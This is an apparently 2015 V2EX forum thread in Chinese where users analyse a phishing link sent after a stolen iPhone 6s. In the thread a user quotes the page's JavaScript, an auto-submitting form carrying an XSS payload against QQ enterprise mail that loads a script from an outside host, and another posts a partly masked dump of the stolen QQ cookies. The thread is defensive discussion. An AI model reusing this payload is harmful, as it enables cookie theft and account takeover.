朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID

2015-11-02 13:32:21 +08:00
 saxon

http://eeee.washbowl.com.cn/
这个是个挂马地址,请各位大师分析一下
如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?

7699 次点击
所在节点    问与答
38 条回复
paradoxs
2015-11-02 13:35:24 +08:00
@typcn
jedyu
2015-11-02 13:42:28 +08:00
手贱点了进去,一堆信息被上传了
ScotGu
2015-11-02 13:44:08 +08:00
@jedyu 感谢你去趟雷~~ 我就不点了。
saxon
2015-11-02 13:44:13 +08:00
@jedyu 我正在分析=-= 有一段 js 应该是用 cookie 去登 QQ 企业邮箱
jedyu
2015-11-02 13:51:29 +08:00
@ScotGu
@saxon
是的,企业邮箱、个人邮箱、 QQ 号码及一堆 Cookie 都被传上去了。

扫了一下注入点,然后发现服务器挂了
saxon
2015-11-02 13:53:07 +08:00
@jedyu 能获得一些额外的信息么
WenJimmy
2015-11-02 13:53:58 +08:00
不敢点
jedyu
2015-11-02 14:00:32 +08:00
@saxon

c=wxstaytime=1423741712;
idqq_account=theCanChange=1;
theShowUin=145xxxxxx;
BindedEmail=maxxxxxx@gmail.com;
EmailCanSeach=1;
EmailIsActive=1;
UinCanSeach=1;
shouldshowmail=1;
firstsetidqq=1;
MSK=0;;
verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba;
qz_gdt=m6uqgvwxxxxxxq4ezk4ka;
qqmusic_uin=;
qqmusic_key=;
qqmusic_fromtag=;
new_mail_num=14xxxxxx8&1;
qm_flag=0;
qqmail_alias=xxxxxx@biz.mail.qq.com;
sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.;
biz_username=261xxxxxx;
CCSHOW=0000;
username=140761208&1403227908|-16342184644&261233652;
ssl_edition=b31.exmail.qq.com;
Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx;
Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx;
_ga=GA1.3.1469923463.1445309872;
qm_username=14xxxxxx;
qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.;
RK=CEeuCexxGR;
pt_clientip=133b3c0cxxxxxx4f;
pt_serverip=b7ff0abfxxxxxx60;
pt2gguin=o0014xxxxxx;
uin=o0014xxxxxx;
skey=@uF8W0XXXc;
ptisp=cnc;
ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985;
pgv_info=ssid=s776441213&pgvReferrer=;
pgv_pvid=775212126;
o_cookie=14xxxxxx;
uid=12xxxxxx;
dc_vplaying=0;
tinfo=14xxxxxx.0000*;
wimrefreshrun=0&;
autologin=n

&u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html
jedyu
2015-11-02 14:11:20 +08:00
@jedyu 然后,我的 IP 好像也被 ban 了
kikyous
2015-11-02 14:13:52 +08:00
<script>
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
});
</script>
谁来讲解一下, qq.com 的 cookie 不是被 post 到腾讯的服务器了吗?他们是怎么得到的?
laydown
2015-11-02 14:27:02 +08:00
我没看正文直接点了,我要不要重装系统啊?!!!
soolby
2015-11-02 14:28:17 +08:00
定期改一下密码复杂一点。
把你的提示问题的答案设置的复杂一点(记得备份)
aliuwr
2015-11-02 14:28:55 +08:00
估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918
10-08 就确认了,还没修复。不知道是不好修复,还是不够重视。 rank 也只给 1 ,真没意思。

@laydown 速度改 QQ 密码就好了。
laydown
2015-11-02 14:30:19 +08:00
@aliuwr Mac 系统,也没装 QQ ,应该没事吧?
squid157
2015-11-02 14:33:19 +08:00
@laydown 看前面回复 似乎是偷 cookie 这就不好说了
skyun
2015-11-02 14:45:13 +08:00
手贱。直接点进去了。。。
wgf2008
2015-11-02 14:46:55 +08:00
D 它
ScotGu
2015-11-02 14:48:47 +08:00
既然这个网站可以直接获取 cookies
那么每天上网百度出的一堆垃圾站也可能用这招,只是没有这个有针对性。
看来用邮件客户端很有必要啊。
Tuibimba
2015-11-02 14:55:37 +08:00
我的 iphone 被偷了后也收到过这类链接
点进去后发现不对劲 立马把相关密码都改了
BOYPT
2015-11-02 14:57:26 +08:00


在匿名模式打开看了下,自动去刷一大堆常见网站,看来有漏用户信息漏洞的公共网站不少啊

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/232901

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX